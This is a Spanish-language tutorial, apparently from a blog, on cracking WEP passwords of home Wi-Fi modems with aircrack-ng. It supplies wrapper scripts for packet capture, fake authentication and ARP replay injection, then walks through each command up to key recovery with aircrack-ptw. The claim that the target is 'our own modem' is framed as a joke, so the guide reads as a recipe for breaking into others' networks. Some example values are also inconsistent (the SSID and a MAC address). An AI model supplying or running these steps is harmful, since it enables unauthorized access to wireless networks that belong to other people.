Primero que todo algo es necesario instalar el aircrack-ng

yum -y install aircrack-ng libcap

Despues bajamos algunos scripts necesarios para crackear redes de forma mas rapida y escribir menos

aircrack-ptw

wificrack1.sh

Contenido:

#!/bin/bash
airodump-ng -w $1 -c $2 $3

wificrack2.sh

Contenido:

#!/bin/bash
aireplay-ng -1 0 -e $1 -a $2 -h $3 $4

wificrack3.sh

Contenido:

#!/bin/bash
aireplay-ng -3 -b $1 -h $2 $3

Ya que los bajaron hay que ponerlos en la misma carpeta
por ejemplo "/home/comandos"

Para que los scripts corran desde cualquier lugar que los inboquemos como super usuario claro crearemos un enlase simbolico en la carpeta "/sbin/" de la siguiente manera

cd /sbin/
ln -s /home/comandos/wificrack3.sh wificrack3
ln -s /home/comandos/wificrack2.sh wificrack2
ln -s /home/comandos/wificrack1.sh wificrack1
ln -s /home/comandos/aircrack-ptw aircrack-ptw
chmod +x wificrack3
chmod +x wificrack2
chmod +x wificrack1
chmod +x aircrack-ptw

Por falta de tiempo les explicare esto rapido suponemos que nuestro ESSID de el modem es "INFINITUM6666" en el cual queremos hacer un test de seguridad probando que tan fuerte es nuestra contraseña WEB "CLARO QUE ES NUESTRO PROPIO MODEM!!"( ja ja )

"00:FF:FF:FF:FF:FF" Es la macaddres de el AP ( MODEM 2WIRE,THOMSOM,ETC... )

"00:11:11:11:11:11" Es la macaddres de nuestra interfas

"ath0" Es nuestra interfas con en modo monitor

NOTA:Si no esta tu tarjeta wifi en modo monitor puedes ponerla con el comando airmon-ng start ath0 te creara una intefas virtual que te indicara al finalizar la ejecucion de el comando y esa interfas virtual estara en modo monitor sera la que utilizaras para los siguientes comandos

Primer paso abre una consola y ejecuta este usuario en una carpeta nueva de preferencia pues ai guardara el archivo en el cuar se quedaran todos los paquetes capturados este comando lee todo el trafico en el canal que le indicamos en este caso es el canal "1".


Este comando se queda funcionando a lo largo de todo el proceso

wificrack1 INFINITUM6666 1 ath0

El segundo paso es para establecer una coneccion valida con el AP(MODEM) para que nos deje inyectar trafico para obtener los paquetes de una forma mas rapida

wificrack2 INFINITUM666 00:FF:FF:FF:FF:FF 00:11:11:11:11:11 ath0

Despues de completar la coneccion correctamente con el ap se devera de ejecutar el siguiente comando en caso que les de una respuesta negativa sera necesario acercarse mas al ap en lo que se inyecta el trafico normalmente no se puede establecer una coneccion por la distancia ya que la señal no tiene la suficiente calidad para conectarnos o nuestra tarjeta WIFI no tiene la suficiente potencia


Este comando lo que hace es inyectar el trafico para que en el paso numero uno capture paquetes mas rapidamente por lo que se quedara inyectando trafico este comando y no lo detendremos

wificrack3 00:FF:FF:FF:FF:FF 00:1:11:11:11:11 ath0

Normalmente en 2 minutos ya obtenemos los 20,000 paquetes que necesitamos para obtener la contrase;a de el ap de 10 digitos si es una clave mas grande tardara mas depende el tipo de encripcion


Al obtener los 20 mil paquetes ejecutamos en una nueva consola el siguiente comando.


El archivo "INFINITUM666.cap" fue creado en el primer paso estara ubicado en la carpeta que se ejecuto el comando wificrack1

aircrack-ptw INFINITUM666.cap

Si los datos capturados son suficientes podras obtener la contraseña que te desifrara el aircrack-ptw


Si alguno de los pasos les marca algun tipo de error no olviden comentar y les contestaremos en cuanto sea posible


Saludos